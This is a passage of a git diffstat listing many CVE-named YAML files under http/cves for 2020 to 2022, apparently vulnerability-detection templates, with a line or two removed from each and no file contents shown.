http/cves/2020/CVE-2020-36289.yaml | 2 -- http/cves/2020/CVE-2020-36365.yaml | 2 -- http/cves/2020/CVE-2020-36510.yaml | 2 -- http/cves/2020/CVE-2020-4463.yaml | 2 -- http/cves/2020/CVE-2020-5191.yaml | 2 -- http/cves/2020/CVE-2020-5192.yaml | 2 -- http/cves/2020/CVE-2020-5284.yaml | 2 -- http/cves/2020/CVE-2020-5307.yaml | 2 -- http/cves/2020/CVE-2020-5405.yaml | 2 -- http/cves/2020/CVE-2020-5410.yaml | 2 -- http/cves/2020/CVE-2020-5412.yaml | 2 -- http/cves/2020/CVE-2020-5775.yaml | 2 -- http/cves/2020/CVE-2020-5776.yaml | 2 -- http/cves/2020/CVE-2020-5777.yaml | 2 -- http/cves/2020/CVE-2020-5847.yaml | 2 -- http/cves/2020/CVE-2020-5902.yaml | 2 -- http/cves/2020/CVE-2020-6171.yaml | 2 -- http/cves/2020/CVE-2020-6207.yaml | 2 -- http/cves/2020/CVE-2020-6287.yaml | 2 -- http/cves/2020/CVE-2020-6308.yaml | 2 -- http/cves/2020/CVE-2020-6637.yaml | 2 -- http/cves/2020/CVE-2020-7107.yaml | 2 -- http/cves/2020/CVE-2020-7136.yaml | 2 -- http/cves/2020/CVE-2020-7209.yaml | 3 --- http/cves/2020/CVE-2020-7318.yaml | 2 -- http/cves/2020/CVE-2020-7796.yaml | 2 -- http/cves/2020/CVE-2020-7943.yaml | 1 - http/cves/2020/CVE-2020-7961.yaml | 2 -- http/cves/2020/CVE-2020-7980.yaml | 2 -- http/cves/2020/CVE-2020-8115.yaml | 2 -- http/cves/2020/CVE-2020-8163.yaml | 2 -- http/cves/2020/CVE-2020-8191.yaml | 2 -- http/cves/2020/CVE-2020-8193.yaml | 2 -- http/cves/2020/CVE-2020-8194.yaml | 2 -- http/cves/2020/CVE-2020-8209.yaml | 2 -- http/cves/2020/CVE-2020-8497.yaml | 2 -- http/cves/2020/CVE-2020-8512.yaml | 2 -- http/cves/2020/CVE-2020-8515.yaml | 2 -- http/cves/2020/CVE-2020-8641.yaml | 2 -- http/cves/2020/CVE-2020-8644.yaml | 1 - http/cves/2020/CVE-2020-8654.yaml | 2 -- http/cves/2020/CVE-2020-8771.yaml | 2 -- http/cves/2020/CVE-2020-8772.yaml | 2 -- http/cves/2020/CVE-2020-8813.yaml | 2 -- http/cves/2020/CVE-2020-8982.yaml | 2 -- http/cves/2020/CVE-2020-9036.yaml | 2 -- http/cves/2020/CVE-2020-9043.yaml | 2 -- http/cves/2020/CVE-2020-9047.yaml | 2 -- http/cves/2020/CVE-2020-9054.yaml | 2 -- http/cves/2020/CVE-2020-9315.yaml | 2 -- http/cves/2020/CVE-2020-9344.yaml | 2 -- http/cves/2020/CVE-2020-9376.yaml | 1 - http/cves/2020/CVE-2020-9402.yaml | 2 -- http/cves/2020/CVE-2020-9425.yaml | 2 -- http/cves/2020/CVE-2020-9483.yaml | 2 -- http/cves/2020/CVE-2020-9484.yaml | 2 -- http/cves/2020/CVE-2020-9496.yaml | 2 -- http/cves/2020/CVE-2020-9757.yaml | 2 -- http/cves/2021/CVE-2021-1472.yaml | 2 -- http/cves/2021/CVE-2021-1497.yaml | 2 -- http/cves/2021/CVE-2021-1498.yaml | 2 -- http/cves/2021/CVE-2021-20031.yaml | 2 -- http/cves/2021/CVE-2021-20038.yaml | 2 -- http/cves/2021/CVE-2021-20090.yaml | 2 -- http/cves/2021/CVE-2021-20091.yaml | 2 -- http/cves/2021/CVE-2021-20092.yaml | 2 -- http/cves/2021/CVE-2021-20114.yaml | 2 -- http/cves/2021/CVE-2021-20123.yaml | 2 -- http/cves/2021/CVE-2021-20124.yaml | 2 -- http/cves/2021/CVE-2021-20137.yaml | 2 -- http/cves/2021/CVE-2021-20150.yaml | 2 -- http/cves/2021/CVE-2021-20158.yaml | 2 -- http/cves/2021/CVE-2021-20167.yaml | 2 -- http/cves/2021/CVE-2021-20323.yaml | 2 -- http/cves/2021/CVE-2021-20792.yaml | 2 -- http/cves/2021/CVE-2021-20837.yaml | 2 -- http/cves/2021/CVE-2021-21087.yaml | 2 -- http/cves/2021/CVE-2021-21234.yaml | 2 -- http/cves/2021/CVE-2021-21287.yaml | 2 -- http/cves/2021/CVE-2021-21307.yaml | 2 -- http/cves/2021/CVE-2021-21311.yaml | 2 -- http/cves/2021/CVE-2021-21315.yaml | 2 -- http/cves/2021/CVE-2021-21351.yaml | 2 -- http/cves/2021/CVE-2021-21389.yaml | 2 -- http/cves/2021/CVE-2021-21402.yaml | 2 -- http/cves/2021/CVE-2021-21479.yaml | 2 -- http/cves/2021/CVE-2021-21745.yaml | 1 - http/cves/2021/CVE-2021-21799.yaml | 2 -- http/cves/2021/CVE-2021-21800.yaml | 2 -- http/cves/2021/CVE-2021-21801.yaml | 2 -- http/cves/2021/CVE-2021-21802.yaml | 2 -- http/cves/2021/CVE-2021-21803.yaml | 2 -- http/cves/2021/CVE-2021-21805.yaml | 2 -- http/cves/2021/CVE-2021-21816.yaml | 2 -- http/cves/2021/CVE-2021-21881.yaml | 2 -- http/cves/2021/CVE-2021-21972.yaml | 2 -- http/cves/2021/CVE-2021-21973.yaml | 2 -- http/cves/2021/CVE-2021-21975.yaml | 2 -- http/cves/2021/CVE-2021-21985.yaml | 2 -- http/cves/2021/CVE-2021-22005.yaml | 2 -- http/cves/2021/CVE-2021-22053.yaml | 2 -- http/cves/2021/CVE-2021-22054.yaml | 1 - http/cves/2021/CVE-2021-22122.yaml | 2 -- http/cves/2021/CVE-2021-22145.yaml | 2 -- http/cves/2021/CVE-2021-22205.yaml | 2 -- http/cves/2021/CVE-2021-22214.yaml | 2 -- http/cves/2021/CVE-2021-22502.yaml | 2 -- http/cves/2021/CVE-2021-22873.yaml | 2 -- http/cves/2021/CVE-2021-22911.yaml | 2 -- http/cves/2021/CVE-2021-22986.yaml | 2 -- http/cves/2021/CVE-2021-23241.yaml | 2 -- http/cves/2021/CVE-2021-24145.yaml | 2 -- http/cves/2021/CVE-2021-24146.yaml | 2 -- http/cves/2021/CVE-2021-24150.yaml | 2 -- http/cves/2021/CVE-2021-24155.yaml | 2 -- http/cves/2021/CVE-2021-24165.yaml | 2 -- http/cves/2021/CVE-2021-24169.yaml | 2 -- http/cves/2021/CVE-2021-24176.yaml | 2 -- http/cves/2021/CVE-2021-24210.yaml | 2 -- http/cves/2021/CVE-2021-24214.yaml | 2 -- http/cves/2021/CVE-2021-24226.yaml | 2 -- http/cves/2021/CVE-2021-24227.yaml | 2 -- http/cves/2021/CVE-2021-24235.yaml | 2 -- http/cves/2021/CVE-2021-24236.yaml | 2 -- http/cves/2021/CVE-2021-24237.yaml | 2 -- http/cves/2021/CVE-2021-24239.yaml | 2 -- http/cves/2021/CVE-2021-24245.yaml | 2 -- http/cves/2021/CVE-2021-24274.yaml | 2 -- http/cves/2021/CVE-2021-24275.yaml | 2 -- http/cves/2021/CVE-2021-24276.yaml | 2 -- http/cves/2021/CVE-2021-24278.yaml | 2 -- http/cves/2021/CVE-2021-24284.yaml | 2 -- http/cves/2021/CVE-2021-24285.yaml | 2 -- http/cves/2021/CVE-2021-24287.yaml | 2 -- http/cves/2021/CVE-2021-24288.yaml | 2 -- http/cves/2021/CVE-2021-24291.yaml | 2 -- http/cves/2021/CVE-2021-24298.yaml | 2 -- http/cves/2021/CVE-2021-24300.yaml | 2 -- http/cves/2021/CVE-2021-24316.yaml | 2 -- http/cves/2021/CVE-2021-24320.yaml | 2 -- http/cves/2021/CVE-2021-24335.yaml | 2 -- http/cves/2021/CVE-2021-24342.yaml | 2 -- http/cves/2021/CVE-2021-24347.yaml | 2 -- http/cves/2021/CVE-2021-24351.yaml | 2 -- http/cves/2021/CVE-2021-24358.yaml | 2 -- http/cves/2021/CVE-2021-24364.yaml | 2 -- http/cves/2021/CVE-2021-24370.yaml | 2 -- http/cves/2021/CVE-2021-24387.yaml | 2 -- http/cves/2021/CVE-2021-24389.yaml | 2 -- http/cves/2021/CVE-2021-24406.yaml | 2 -- http/cves/2021/CVE-2021-24407.yaml | 2 -- http/cves/2021/CVE-2021-24436.yaml | 2 -- http/cves/2021/CVE-2021-24452.yaml | 2 -- http/cves/2021/CVE-2021-24472.yaml | 2 -- http/cves/2021/CVE-2021-24488.yaml | 2 -- http/cves/2021/CVE-2021-24495.yaml | 2 -- http/cves/2021/CVE-2021-24498.yaml | 2 -- http/cves/2021/CVE-2021-24499.yaml | 1 - http/cves/2021/CVE-2021-24510.yaml | 2 -- http/cves/2021/CVE-2021-24554.yaml | 2 -- http/cves/2021/CVE-2021-24666.yaml | 2 -- http/cves/2021/CVE-2021-24746.yaml | 2 -- http/cves/2021/CVE-2021-24750.yaml | 2 -- http/cves/2021/CVE-2021-24762.yaml | 1 - http/cves/2021/CVE-2021-24827.yaml | 2 -- http/cves/2021/CVE-2021-24838.yaml | 2 -- http/cves/2021/CVE-2021-24862.yaml | 2 -- http/cves/2021/CVE-2021-24875.yaml | 2 -- http/cves/2021/CVE-2021-24891.yaml | 2 -- http/cves/2021/CVE-2021-24910.yaml | 1 - http/cves/2021/CVE-2021-24917.yaml | 2 -- http/cves/2021/CVE-2021-24926.yaml | 2 -- http/cves/2021/CVE-2021-24931.yaml | 2 -- http/cves/2021/CVE-2021-24940.yaml | 2 -- http/cves/2021/CVE-2021-24946.yaml | 2 -- http/cves/2021/CVE-2021-24947.yaml | 2 -- http/cves/2021/CVE-2021-24970.yaml | 2 -- http/cves/2021/CVE-2021-24987.yaml | 2 -- http/cves/2021/CVE-2021-24991.yaml | 2 -- http/cves/2021/CVE-2021-24997.yaml | 2 -- http/cves/2021/CVE-2021-25003.yaml | 2 -- http/cves/2021/CVE-2021-25008.yaml | 2 -- http/cves/2021/CVE-2021-25028.yaml | 2 -- http/cves/2021/CVE-2021-25033.yaml | 2 -- http/cves/2021/CVE-2021-25052.yaml | 2 -- http/cves/2021/CVE-2021-25055.yaml | 2 -- http/cves/2021/CVE-2021-25063.yaml | 2 -- http/cves/2021/CVE-2021-25067.yaml | 2 -- http/cves/2021/CVE-2021-25074.yaml | 2 -- http/cves/2021/CVE-2021-25075.yaml | 2 -- http/cves/2021/CVE-2021-25085.yaml | 2 -- http/cves/2021/CVE-2021-25099.yaml | 2 -- http/cves/2021/CVE-2021-25104.yaml | 2 -- http/cves/2021/CVE-2021-25111.yaml | 2 -- http/cves/2021/CVE-2021-25112.yaml | 2 -- http/cves/2021/CVE-2021-25114.yaml | 2 -- http/cves/2021/CVE-2021-25118.yaml | 2 -- http/cves/2021/CVE-2021-25120.yaml | 2 -- http/cves/2021/CVE-2021-25281.yaml | 2 -- http/cves/2021/CVE-2021-25296.yaml | 2 -- http/cves/2021/CVE-2021-25297.yaml | 2 -- http/cves/2021/CVE-2021-25298.yaml | 2 -- http/cves/2021/CVE-2021-25299.yaml | 2 -- http/cves/2021/CVE-2021-25646.yaml | 1 - http/cves/2021/CVE-2021-25864.yaml | 2 -- http/cves/2021/CVE-2021-25899.yaml | 2 -- http/cves/2021/CVE-2021-26084.yaml | 2 -- http/cves/2021/CVE-2021-26085.yaml | 2 -- http/cves/2021/CVE-2021-26086.yaml | 2 -- http/cves/2021/CVE-2021-26247.yaml | 2 -- http/cves/2021/CVE-2021-26295.yaml | 2 -- http/cves/2021/CVE-2021-26475.yaml | 2 -- http/cves/2021/CVE-2021-26598.yaml | 2 -- http/cves/2021/CVE-2021-26702.yaml | 2 -- http/cves/2021/CVE-2021-26710.yaml | 2 -- http/cves/2021/CVE-2021-26723.yaml | 2 -- http/cves/2021/CVE-2021-26812.yaml | 2 -- http/cves/2021/CVE-2021-26855.yaml | 2 -- http/cves/2021/CVE-2021-27132.yaml | 2 -- http/cves/2021/CVE-2021-27309.yaml | 2 -- http/cves/2021/CVE-2021-27310.yaml | 2 -- http/cves/2021/CVE-2021-27330.yaml | 2 -- http/cves/2021/CVE-2021-27358.yaml | 2 -- http/cves/2021/CVE-2021-27519.yaml | 2 -- http/cves/2021/CVE-2021-27520.yaml | 2 -- http/cves/2021/CVE-2021-27561.yaml | 2 -- http/cves/2021/CVE-2021-27651.yaml | 2 -- http/cves/2021/CVE-2021-27748.yaml | 2 -- http/cves/2021/CVE-2021-27850.yaml | 2 -- http/cves/2021/CVE-2021-27905.yaml | 2 -- http/cves/2021/CVE-2021-27909.yaml | 2 -- http/cves/2021/CVE-2021-27931.yaml | 2 -- http/cves/2021/CVE-2021-28073.yaml | 2 -- http/cves/2021/CVE-2021-28149.yaml | 2 -- http/cves/2021/CVE-2021-28150.yaml | 2 -- http/cves/2021/CVE-2021-28151.yaml | 2 -- http/cves/2021/CVE-2021-28164.yaml | 2 -- http/cves/2021/CVE-2021-28169.yaml | 2 -- http/cves/2021/CVE-2021-28377.yaml | 2 -- http/cves/2021/CVE-2021-28419.yaml | 2 -- http/cves/2021/CVE-2021-28854.yaml | 2 -- http/cves/2021/CVE-2021-28918.yaml | 2 -- http/cves/2021/CVE-2021-28937.yaml | 2 -- http/cves/2021/CVE-2021-29156.yaml | 2 -- http/cves/2021/CVE-2021-29203.yaml | 2 -- http/cves/2021/CVE-2021-29441.yaml | 2 -- http/cves/2021/CVE-2021-29442.yaml | 2 -- http/cves/2021/CVE-2021-29484.yaml | 2 -- http/cves/2021/CVE-2021-29490.yaml | 2 -- http/cves/2021/CVE-2021-29505.yaml | 2 -- http/cves/2021/CVE-2021-29622.yaml | 2 -- http/cves/2021/CVE-2021-29625.yaml | 2 -- http/cves/2021/CVE-2021-3002.yaml | 2 -- http/cves/2021/CVE-2021-30049.yaml | 2 -- http/cves/2021/CVE-2021-30128.yaml | 2 -- http/cves/2021/CVE-2021-30134.yaml | 2 -- http/cves/2021/CVE-2021-30151.yaml | 2 -- http/cves/2021/CVE-2021-3017.yaml | 2 -- http/cves/2021/CVE-2021-3019.yaml | 2 -- http/cves/2021/CVE-2021-30213.yaml | 2 -- http/cves/2021/CVE-2021-30461.yaml | 2 -- http/cves/2021/CVE-2021-30497.yaml | 2 -- http/cves/2021/CVE-2021-3110.yaml | 2 -- http/cves/2021/CVE-2021-31195.yaml | 2 -- http/cves/2021/CVE-2021-31249.yaml | 2 -- http/cves/2021/CVE-2021-31250.yaml | 2 -- http/cves/2021/CVE-2021-3129.yaml | 2 -- http/cves/2021/CVE-2021-31537.yaml | 2 -- http/cves/2021/CVE-2021-31581.yaml | 2 -- http/cves/2021/CVE-2021-31589.yaml | 2 -- http/cves/2021/CVE-2021-31602.yaml | 2 -- http/cves/2021/CVE-2021-31682.yaml | 2 -- http/cves/2021/CVE-2021-31755.yaml | 2 -- http/cves/2021/CVE-2021-31805.yaml | 2 -- http/cves/2021/CVE-2021-31856.yaml | 2 -- http/cves/2021/CVE-2021-31862.yaml | 2 -- http/cves/2021/CVE-2021-32030.yaml | 2 -- http/cves/2021/CVE-2021-32172.yaml | 2 -- http/cves/2021/CVE-2021-3223.yaml | 2 -- http/cves/2021/CVE-2021-32305.yaml | 2 -- http/cves/2021/CVE-2021-32618.yaml | 2 -- http/cves/2021/CVE-2021-32682.yaml | 2 -- http/cves/2021/CVE-2021-32789.yaml | 2 -- http/cves/2021/CVE-2021-32819.yaml | 2 -- http/cves/2021/CVE-2021-32820.yaml | 1 - http/cves/2021/CVE-2021-32853.yaml | 2 -- http/cves/2021/CVE-2021-3293.yaml | 2 -- http/cves/2021/CVE-2021-3297.yaml | 2 -- http/cves/2021/CVE-2021-33044.yaml | 2 -- http/cves/2021/CVE-2021-33221.yaml | 2 -- http/cves/2021/CVE-2021-33357.yaml | 2 -- http/cves/2021/CVE-2021-33544.yaml | 2 -- http/cves/2021/CVE-2021-33564.yaml | 2 -- http/cves/2021/CVE-2021-3374.yaml | 2 -- http/cves/2021/CVE-2021-3377.yaml | 2 -- http/cves/2021/CVE-2021-33807.yaml | 2 -- http/cves/2021/CVE-2021-33851.yaml | 2 -- http/cves/2021/CVE-2021-33904.yaml | 2 -- http/cves/2021/CVE-2021-34370.yaml | 2 -- http/cves/2021/CVE-2021-34429.yaml | 2 -- http/cves/2021/CVE-2021-34473.yaml | 2 -- http/cves/2021/CVE-2021-34621.yaml | 2 -- http/cves/2021/CVE-2021-34640.yaml | 2 -- http/cves/2021/CVE-2021-34643.yaml | 2 -- http/cves/2021/CVE-2021-34805.yaml | 2 -- http/cves/2021/CVE-2021-35250.yaml | 2 -- http/cves/2021/CVE-2021-35265.yaml | 2 -- http/cves/2021/CVE-2021-35336.yaml | 2 -- http/cves/2021/CVE-2021-35380.yaml | 2 -- http/cves/2021/CVE-2021-35464.yaml | 2 -- http/cves/2021/CVE-2021-35488.yaml | 2 -- http/cves/2021/CVE-2021-35587.yaml | 2 -- http/cves/2021/CVE-2021-3577.yaml | 2 -- http/cves/2021/CVE-2021-36260.yaml | 2 -- http/cves/2021/CVE-2021-36356.yaml | 2 -- http/cves/2021/CVE-2021-36380.yaml | 2 -- http/cves/2021/CVE-2021-36450.yaml | 2 -- http/cves/2021/CVE-2021-3654.yaml | 2 -- http/cves/2021/CVE-2021-36580.yaml | 1 - http/cves/2021/CVE-2021-36748.yaml | 2 -- http/cves/2021/CVE-2021-36749.yaml | 2 -- http/cves/2021/CVE-2021-36873.yaml | 2 -- http/cves/2021/CVE-2021-37216.yaml | 2 -- http/cves/2021/CVE-2021-37416.yaml | 2 -- http/cves/2021/CVE-2021-37538.yaml | 2 -- http/cves/2021/CVE-2021-37573.yaml | 2 -- http/cves/2021/CVE-2021-37580.yaml | 2 -- http/cves/2021/CVE-2021-37589.yaml | 2 -- http/cves/2021/CVE-2021-37704.yaml | 2 -- http/cves/2021/CVE-2021-37833.yaml | 2 -- http/cves/2021/CVE-2021-38314.yaml | 2 -- http/cves/2021/CVE-2021-38540.yaml | 3 --- http/cves/2021/CVE-2021-38647.yaml | 2 -- http/cves/2021/CVE-2021-38702.yaml | 2 -- http/cves/2021/CVE-2021-38704.yaml | 2 -- http/cves/2021/CVE-2021-38751.yaml | 2 -- http/cves/2021/CVE-2021-39141.yaml | 2 -- http/cves/2021/CVE-2021-39144.yaml | 1 - http/cves/2021/CVE-2021-39146.yaml | 2 -- http/cves/2021/CVE-2021-39152.yaml | 2 -- http/cves/2021/CVE-2021-39211.yaml | 2 -- http/cves/2021/CVE-2021-39226.yaml | 2 -- http/cves/2021/CVE-2021-39312.yaml | 2 -- http/cves/2021/CVE-2021-39316.yaml | 2 -- http/cves/2021/CVE-2021-39320.yaml | 2 -- http/cves/2021/CVE-2021-39322.yaml | 2 -- http/cves/2021/CVE-2021-39327.yaml | 2 -- http/cves/2021/CVE-2021-39350.yaml | 2 -- http/cves/2021/CVE-2021-39433.yaml | 2 -- http/cves/2021/CVE-2021-39501.yaml | 2 -- http/cves/2021/CVE-2021-40149.yaml | 2 -- http/cves/2021/CVE-2021-40150.yaml | 2 -- http/cves/2021/CVE-2021-40323.yaml | 2 -- http/cves/2021/CVE-2021-40438.yaml | 2 -- http/cves/2021/CVE-2021-40539.yaml | 2 -- http/cves/2021/CVE-2021-40542.yaml | 2 -- http/cves/2021/CVE-2021-40661.yaml | 2 -- http/cves/2021/CVE-2021-40822.yaml | 2 -- http/cves/2021/CVE-2021-40856.yaml | 2 -- http/cves/2021/CVE-2021-40859.yaml | 2 -- http/cves/2021/CVE-2021-40868.yaml | 2 -- http/cves/2021/CVE-2021-40870.yaml | 2 -- http/cves/2021/CVE-2021-40875.yaml | 2 -- http/cves/2021/CVE-2021-40960.yaml | 2 -- http/cves/2021/CVE-2021-40978.yaml | 2 -- http/cves/2021/CVE-2021-41174.yaml | 2 -- http/cves/2021/CVE-2021-41192.yaml | 2 -- http/cves/2021/CVE-2021-41266.yaml | 2 -- http/cves/2021/CVE-2021-41277.yaml | 2 -- http/cves/2021/CVE-2021-41282.yaml | 2 -- http/cves/2021/CVE-2021-41291.yaml | 2 -- http/cves/2021/CVE-2021-41293.yaml | 2 -- http/cves/2021/CVE-2021-41349.yaml | 2 -- http/cves/2021/CVE-2021-41381.yaml | 2 -- http/cves/2021/CVE-2021-41432.yaml | 2 -- http/cves/2021/CVE-2021-41467.yaml | 2 -- http/cves/2021/CVE-2021-41569.yaml | 2 -- http/cves/2021/CVE-2021-41648.yaml | 2 -- http/cves/2021/CVE-2021-41649.yaml | 2 -- http/cves/2021/CVE-2021-41653.yaml | 2 -- http/cves/2021/CVE-2021-41691.yaml | 2 -- http/cves/2021/CVE-2021-41773.yaml | 2 -- http/cves/2021/CVE-2021-41826.yaml | 2 -- http/cves/2021/CVE-2021-41878.yaml | 2 -- http/cves/2021/CVE-2021-4191.yaml | 2 -- http/cves/2021/CVE-2021-41951.yaml | 2 -- http/cves/2021/CVE-2021-42013.yaml | 2 -- http/cves/2021/CVE-2021-42063.yaml | 2 -- http/cves/2021/CVE-2021-42071.yaml | 2 -- http/cves/2021/CVE-2021-42192.yaml | 2 -- http/cves/2021/CVE-2021-42237.yaml | 2 -- http/cves/2021/CVE-2021-42258.yaml | 2 -- http/cves/2021/CVE-2021-42551.yaml | 2 -- http/cves/2021/CVE-2021-42565.yaml | 2 -- http/cves/2021/CVE-2021-42566.yaml | 2 -- http/cves/2021/CVE-2021-42567.yaml | 2 -- http/cves/2021/CVE-2021-42627.yaml | 2 -- http/cves/2021/CVE-2021-42663.yaml | 2 -- http/cves/2021/CVE-2021-42667.yaml | 2 -- http/cves/2021/CVE-2021-42887.yaml | 2 -- http/cves/2021/CVE-2021-43062.yaml | 2 -- http/cves/2021/CVE-2021-43287.yaml | 2 -- http/cves/2021/CVE-2021-43421.yaml | 2 -- http/cves/2021/CVE-2021-43495.yaml | 2 -- http/cves/2021/CVE-2021-43496.yaml | 2 -- http/cves/2021/CVE-2021-43510.yaml | 2 -- http/cves/2021/CVE-2021-43574.yaml | 2 -- http/cves/2021/CVE-2021-43734.yaml | 2 -- http/cves/2021/CVE-2021-43778.yaml | 2 -- http/cves/2021/CVE-2021-43810.yaml | 2 -- http/cves/2021/CVE-2021-44077.yaml | 2 -- http/cves/2021/CVE-2021-44152.yaml | 2 -- http/cves/2021/CVE-2021-44427.yaml | 2 -- http/cves/2021/CVE-2021-44451.yaml | 2 -- http/cves/2021/CVE-2021-44515.yaml | 2 -- http/cves/2021/CVE-2021-44528.yaml | 2 -- http/cves/2021/CVE-2021-44529.yaml | 2 -- http/cves/2021/CVE-2021-44848.yaml | 2 -- http/cves/2021/CVE-2021-45043.yaml | 2 -- http/cves/2021/CVE-2021-45046.yaml | 2 -- http/cves/2021/CVE-2021-45092.yaml | 2 -- http/cves/2021/CVE-2021-45232.yaml | 2 -- http/cves/2021/CVE-2021-45380.yaml | 2 -- http/cves/2021/CVE-2021-45422.yaml | 2 -- http/cves/2021/CVE-2021-45428.yaml | 2 -- http/cves/2021/CVE-2021-45967.yaml | 1 - http/cves/2021/CVE-2021-45968.yaml | 2 -- http/cves/2021/CVE-2021-46005.yaml | 2 -- http/cves/2021/CVE-2021-46068.yaml | 2 -- http/cves/2021/CVE-2021-46069.yaml | 2 -- http/cves/2021/CVE-2021-46071.yaml | 2 -- http/cves/2021/CVE-2021-46072.yaml | 2 -- http/cves/2021/CVE-2021-46073.yaml | 2 -- http/cves/2021/CVE-2021-46379.yaml | 2 -- http/cves/2021/CVE-2021-46381.yaml | 2 -- http/cves/2021/CVE-2021-46387.yaml | 2 -- http/cves/2021/CVE-2021-46417.yaml | 2 -- http/cves/2021/CVE-2021-46422.yaml | 2 -- http/cves/2021/CVE-2021-46424.yaml | 2 -- http/cves/2022/CVE-2022-0140.yaml | 2 -- http/cves/2022/CVE-2022-0147.yaml | 2 -- http/cves/2022/CVE-2022-0148.yaml | 2 -- http/cves/2022/CVE-2022-0149.yaml | 2 -- http/cves/2022/CVE-2022-0150.yaml | 2 -- http/cves/2022/CVE-2022-0165.yaml | 2 -- http/cves/2022/CVE-2022-0189.yaml | 2 -- http/cves/2022/CVE-2022-0201.yaml | 2 -- http/cves/2022/CVE-2022-0206.yaml | 2 -- http/cves/2022/CVE-2022-0208.yaml | 2 -- http/cves/2022/CVE-2022-0212.yaml | 2 -- http/cves/2022/CVE-2022-0218.yaml | 2 -- http/cves/2022/CVE-2022-0220.yaml | 2 -- http/cves/2022/CVE-2022-0234.yaml | 2 -- http/cves/2022/CVE-2022-0271.yaml | 2 -- http/cves/2022/CVE-2022-0281.yaml | 2 -- http/cves/2022/CVE-2022-0288.yaml | 2 -- http/cves/2022/CVE-2022-0346.yaml | 2 -- http/cves/2022/CVE-2022-0349.yaml | 2 -- http/cves/2022/CVE-2022-0378.yaml | 2 -- http/cves/2022/CVE-2022-0381.yaml | 2 -- http/cves/2022/CVE-2022-0412.yaml | 2 -- http/cves/2022/CVE-2022-0415.yaml | 2 -- http/cves/2022/CVE-2022-0422.yaml | 2 -- http/cves/2022/CVE-2022-0432.yaml | 2 -- http/cves/2022/CVE-2022-0434.yaml | 2 -- http/cves/2022/CVE-2022-0437.yaml | 2 -- http/cves/2022/CVE-2022-0441.yaml | 2 -- http/cves/2022/CVE-2022-0482.yaml | 2 -- http/cves/2022/CVE-2022-0535.yaml | 2 -- http/cves/2022/CVE-2022-0540.yaml | 2 -- http/cves/2022/CVE-2022-0591.yaml | 2 -- http/cves/2022/CVE-2022-0594.yaml | 2 -- http/cves/2022/CVE-2022-0595.yaml | 2 -- http/cves/2022/CVE-2022-0599.yaml | 2 -- http/cves/2022/CVE-2022-0653.yaml | 2 -- http/cves/2022/CVE-2022-0656.yaml | 2 -- http/cves/2022/CVE-2022-0660.yaml | 2 -- http/cves/2022/CVE-2022-0678.yaml | 2 -- http/cves/2022/CVE-2022-0679.yaml | 2 -- http/cves/2022/CVE-2022-0692.yaml | 2 -- http/cves/2022/CVE-2022-0693.yaml | 2 -- http/cves/2022/CVE-2022-0735.yaml | 2 -- http/cves/2022/CVE-2022-0760.yaml | 2 -- http/cves/2022/CVE-2022-0776.yaml | 2 -- http/cves/2022/CVE-2022-0781.yaml | 2 -- http/cves/2022/CVE-2022-0784.yaml | 2 -- http/cves/2022/CVE-2022-0785.yaml | 2 -- http/cves/2022/CVE-2022-0786.yaml | 2 -- http/cves/2022/CVE-2022-0788.yaml | 2 -- http/cves/2022/CVE-2022-0817.yaml | 2 -- http/cves/2022/CVE-2022-0824.yaml | 2 -- http/cves/2022/CVE-2022-0826.yaml | 2 -- http/cves/2022/CVE-2022-0827.yaml | 2 -- http/cves/2022/CVE-2022-0867.yaml | 2 -- http/cves/2022/CVE-2022-0870.yaml | 2 -- http/cves/2022/CVE-2022-0885.yaml | 2 -- http/cves/2022/CVE-2022-0928.yaml | 2 -- http/cves/2022/CVE-2022-0948.yaml | 2 -- http/cves/2022/CVE-2022-0949.yaml | 2 -- http/cves/2022/CVE-2022-0952.yaml | 2 -- http/cves/2022/CVE-2022-0954.yaml | 2 -- http/cves/2022/CVE-2022-0963.yaml | 2 -- http/cves/2022/CVE-2022-0968.yaml | 2 -- http/cves/2022/CVE-2022-1007.yaml | 2 -- http/cves/2022/CVE-2022-1013.yaml | 2 -- http/cves/2022/CVE-2022-1020.yaml | 2 -- http/cves/2022/CVE-2022-1040.yaml | 2 -- http/cves/2022/CVE-2022-1054.yaml | 2 -- http/cves/2022/CVE-2022-1057.yaml | 2 -- http/cves/2022/CVE-2022-1058.yaml | 2 -- http/cves/2022/CVE-2022-1119.yaml | 2 -- http/cves/2022/CVE-2022-1162.yaml | 2 -- http/cves/2022/CVE-2022-1168.yaml | 2 -- http/cves/2022/CVE-2022-1221.yaml | 2 -- http/cves/2022/CVE-2022-1329.yaml | 2 -- http/cves/2022/CVE-2022-1386.yaml | 2 -- http/cves/2022/CVE-2022-1388.yaml | 2 -- http/cves/2022/CVE-2022-1390.yaml | 2 -- http/cves/2022/CVE-2022-1391.yaml | 2 -- http/cves/2022/CVE-2022-1392.yaml | 2 -- http/cves/2022/CVE-2022-1398.yaml | 2 -- http/cves/2022/CVE-2022-1439.yaml | 2 -- http/cves/2022/CVE-2022-1442.yaml | 2 -- http/cves/2022/CVE-2022-1574.yaml | 2 -- http/cves/2022/CVE-2022-1597.yaml | 2 -- http/cves/2022/CVE-2022-1598.yaml | 2 -- http/cves/2022/CVE-2022-1609.yaml | 2 -- http/cves/2022/CVE-2022-1713.yaml | 2 -- http/cves/2022/CVE-2022-1724.yaml | 2 -- http/cves/2022/CVE-2022-1768.yaml | 2 -- http/cves/2022/CVE-2022-1815.yaml | 2 -- http/cves/2022/CVE-2022-1883.yaml | 2 -- http/cves/2022/CVE-2022-1904.yaml | 2 -- http/cves/2022/CVE-2022-1906.yaml | 2 -- http/cves/2022/CVE-2022-1910.yaml | 2 -- http/cves/2022/CVE-2022-1916.yaml | 2 -- http/cves/2022/CVE-2022-1933.yaml | 2 -- http/cves/2022/CVE-2022-1937.yaml | 2 -- http/cves/2022/CVE-2022-1946.yaml | 2 -- http/cves/2022/CVE-2022-1952.yaml | 2 -- http/cves/2022/CVE-2022-2034.yaml | 2 -- http/cves/2022/CVE-2022-21371.yaml | 2 -- http/cves/2022/CVE-2022-21500.yaml | 2 -- http/cves/2022/CVE-2022-21587.yaml | 2 -- http/cves/2022/CVE-2022-21661.yaml | 2 -- http/cves/2022/CVE-2022-21705.yaml | 2 -- http/cves/2022/CVE-2022-2185.yaml | 2 -- http/cves/2022/CVE-2022-2187.yaml | 2 -- http/cves/2022/CVE-2022-22242.yaml | 2 -- http/cves/2022/CVE-2022-22536.yaml | 2 -- http/cves/2022/CVE-2022-2290.yaml | 2 -- http/cves/2022/CVE-2022-22947.yaml | 2 -- http/cves/2022/CVE-2022-22954.yaml | 2 -- http/cves/2022/CVE-2022-22963.yaml | 2 -- http/cves/2022/CVE-2022-22965.yaml | 2 -- http/cves/2022/CVE-2022-22972.yaml | 2 -- 